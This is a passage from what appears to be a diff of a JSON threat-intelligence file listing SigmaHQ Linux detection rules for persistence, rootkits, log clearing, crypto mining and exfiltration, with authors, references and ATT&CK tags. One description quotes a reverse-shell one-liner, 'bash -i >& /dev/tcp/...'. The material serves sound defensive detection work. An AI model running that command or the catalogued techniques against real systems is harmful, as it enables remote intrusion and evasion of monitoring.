"https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_cron_files.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.003" - ] - }, - "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", - "value": "Persistence Via Cron Files" - }, - { - "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/05", - "falsepositive": [ - "Creation of legitimate files in sudoers.d folder part of administrator work" - ], - "filename": "file_create_lnx_persistence_sudoers_files.yml", - "level": "medium", - "logsource.category": "file_create", - "logsource.product": "linux", - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_sudoers_files.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.003" - ] - }, - "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", - "value": "Persistence Via Sudoers Files" - }, - { - "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_create_lnx_triple_cross_rootkit_lock_file.yml", - "level": "high", - "logsource.category": "file_create", - "logsource.product": "linux", - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_lock_file.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "c0239255-822c-4630-b7f1-35362bcb8f44", - "value": "Triple Cross eBPF Rootkit Default LockFile" - }, - { - "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_create_lnx_triple_cross_rootkit_persistence.yml", - "level": "high", - "logsource.category": "file_create", - "logsource.product": "linux", - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1053.003" - ] - }, - "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", - "value": "Triple Cross eBPF Rootkit Default Persistence" - }, - { - "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/28", - "falsepositive": [ - "Vulnerability scanners", - "Frequent attacks if system faces Internet" - ], - "filename": "modsec_mulitple_blocks.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/modsecurity/modsec_mulitple_blocks.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499" - ] - }, - "uuid": "a06eea10-d932-4aa6-8ba9-186df72c8d23", - "value": "Multiple Modsecurity Blocks" - }, - { - "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/10/16", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_lnx_back_connect_shell_dev.yml", - "level": "critical", - "logsource.category": "network_connection", - "logsource.product": "linux", - "refs": [ - "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" - ], - "tags": "No established tags" - }, - "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", - "value": "Linux Reverse Shell Indicator" - }, - { - "description": "Detects process connections to a Monero crypto mining pool", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/10/26", - "falsepositive": [ - "Legitimate use of crypto miners" - ], - "filename": "net_connection_lnx_crypto_mining_indicators.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "linux", - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" - ], - "tags": "No established tags" - }, - "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", - "value": "Linux Crypto Mining Pool Connections" - }, - { - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/11/03", - "falsepositive": [ - "Legitimate use of ngrok" - ], - "filename": "net_connection_lnx_ngrok_tunnel.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "linux", - "refs": [ - "https://twitter.com/hakluke/status/1587733971814977537/photo/1", - "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" - ] - }, - "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", - "value": "Communication To Ngrok Tunneling Service - Linux" - }, - { - "description": "Detects relevant ClamAV messages", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/01", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_clamav.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_clamav.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.001" - ] - }, - "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", - "value": "Relevant ClamAV Message" - }, - { - "description": "Detects disabling security tools", - "meta": { - "author": "Ömer Günal, Alejandro Ortuno, oscd.community", - "creation_date": "2020/06/17", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "lnx_security_tools_disabling_syslog.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_security_tools_disabling_syslog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", - "value": "Disabling Security Tools - Builtin" - }, - { - "description": "Detects exploitation attempt using public exploit code for CVE-2018-15473", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_ssh_cve_2018_15473.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/Rhynorater/CVE-2018-15473-Exploit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_ssh_cve_2018_15473.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1589" - ] - }, - "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", - "value": "SSHD Error Message CVE-2018-15473" - }, - { - "description": "Detects suspicious failed logins with different user accounts from a single source system", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/16", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Workstations with frequently changing users" - ], - "filename": "lnx_susp_failed_logons_single_source.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_failed_logons_single_source.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "fc947f8e-ea81-4b14-9a7b-13f888f94e18", - "value": "Failed Logins with Different Accounts from Single Source - Linux" - }, - { - "description": "Detects suspicious session with two users present", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/03", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_susp_guacamole.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://research.checkpoint.com/2020/apache-guacamole-rce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_guacamole.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ] - }, - "uuid": "1edd77db-0669-4fef-9598-165bda82826d", - "value": "Guacamole Two Users Sharing Session Anomaly" - }, - { - "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/02/20", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_susp_named.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_named.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", - "value": "Suspicious Named Error" - }, - { - "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/06/30", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_susp_ssh.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_ssh.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", - "value": "Suspicious OpenSSH Daemon Error" - }, - { - "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/07/05", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_susp_vsftp.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/dagwieers/vsftpd/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_vsftp.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", - "value": "Suspicious VSFTPD Error Messages" - }, - { - "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", - "meta": { - "author": "Ömer Günal, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_at_command.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.002" - ] - }, - "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", - "value": "Scheduled Task/Job At" - }, - { - "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_lnx_base64_decode.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "e2072cab-8c9a-459b-b63c-40ae79e27031", - "value": "Decode Base64 Encoded Text" - }, - { - "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", - "meta": { - "author": "pH-T", - "creation_date": "2022/07/26", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_base64_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/arget13/DDexec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ] - }, - "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", - "value": "Linux Base64 Encoded Pipe to Shell" - }, - { - "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/15", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_base64_shebang_cli.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", - "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ] - }, - "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", - "value": "Linux Base64 Encoded Shebang In CLI" - }, - { - "description": "Detects the usage of the unsafe bpftrace option", - "meta": { - "author": "Andreas Hunkeler (@Karneades)", - "creation_date": "2022/02/11", - "falsepositive": [ - "Legitimate usage of the unsafe option" - ], - "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", - "https://bpftrace.org/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ] - }, - "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", - "value": "BPFtrace Unsafe Option Usage" - }, - { - "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/20", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_cat_sudoers.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1592.004" - ] - }, - "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", - "value": "Cat Sudoers" - }, - { - "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/15", - "falsepositive": [ - "Administrator interacting with immutable files (e.g. for instance backups)." - ], - "filename": "proc_creation_lnx_chattr_immutable_removal.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ] - }, - "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", - "value": "Remove Immutable File Attribute" - }, - { - "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion", - "meta": { - "author": "Ömer Günal, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_clear_logs.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.002" - ] - }, - "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", - "value": "Clear Linux Logs" - }, - { - "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", - "meta": { - "author": "Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": "2021/10/15", - "falsepositive": [ - "Log rotation." - ], - "filename": "proc_creation_lnx_clear_syslog.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.002" - ] - }, - "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", - "value": "Commands to Clear or Remove the Syslog" - }, - { - "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "meta": { - "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": "2021/10/15", - "falsepositive": [ - "Legitimate usage of xclip tools." - ], - "filename": "proc_creation_lnx_clipboard_collection.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.packetlabs.net/posts/clipboard-data-security/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ] - }, - "uuid": "ec127035-a636-4b9a-8555-0efd4e59f316", - "value": "Clipboard Collection with Xclip Tool" - }, - { - "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_lnx_crontab_removal.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", - "value": "Remove Scheduled Cron Task/Job" - }, - { - "description": "Detects command line parameters or strings often used by crypto miners", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/10/26", - "falsepositive": [ - "Legitimate use of crypto miners" - ], - "filename": "proc_creation_lnx_crypto_mining.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" - ], - "tags": "No established tags" - }, - "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1", - "value": "Linux Crypto Mining Indicators" - }, - { - "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/15", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "filename": "proc_creation_lnx_curl_usage.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", - "value": "Curl Usage on Linux" - }, - { - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" - ], - "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059", - "cve.2022.26134" - ] - }, - "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", - "value": "Atlassian Confluence CVE-2022-26134" - }, - { - "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", - "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", - "https://github.com/apache/spark/pull/36315/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.33891" - ] - }, - "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", - "value": "Apache Spark Shell Command Injection - ProcessCreation" - }, - { - "description": "Detects potential overwriting and deletion of a file using DD.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": "2021/10/15", - "falsepositive": [ - "Any user deleting files that way." - ], - "filename": "proc_creation_lnx_dd_file_overwrite.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "2953194b-e33c-4859-b9e8-05948c167447", - "value": "DD File Overwrite" - }, - { - "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.", - "meta": { - "author": "Sittikorn S, Teoderick Contreras", - "creation_date": "2022/01/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_lnx_doas_execution.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://research.splunk.com/endpoint/linux_doas_tool_execution/", - "https://www.makeuseof.com/how-to-install-and-use-doas/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", - "value": "Linux Doas Tool Execution" - }, - { - "description": "Detects usage of system utilities to discover files and directories", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_lnx_file_and_directory_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", - "value": "File and Directory Discovery - Linux" - }, - { - "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", - "meta": { - "author": "Ömer Günal, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_file_deletion.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", - "value": "File Deletion" - }, - { - "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", - "meta": { - "author": "Ömer Günal, oscd.community", - "creation_date": "2020/10/05", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_install_root_certificate.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.004" - ] - }, - "uuid": "78a80655-a51e-4669-bc6b-e9d206a462ee", - "value": "Install Root Certificate" - }, - { - "description": "Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_local_account.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001" - ] - }, - "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", - "value": "Local System Accounts Discovery - Linux" - }, - { - "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings", - "meta": { - "author": "Ömer Günal, Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/11", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_local_groups.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d", - "value": "Local Groups Discovery - Linux" - }, - { - "description": "Detects enumeration of local or remote network services.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/21", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_network_service_scanning.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ] - }, - "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31", - "value": "Linux Network Service Scanning" - }, - { - "description": "Detects usage of nohup which could be leveraged by an attacker to keep a 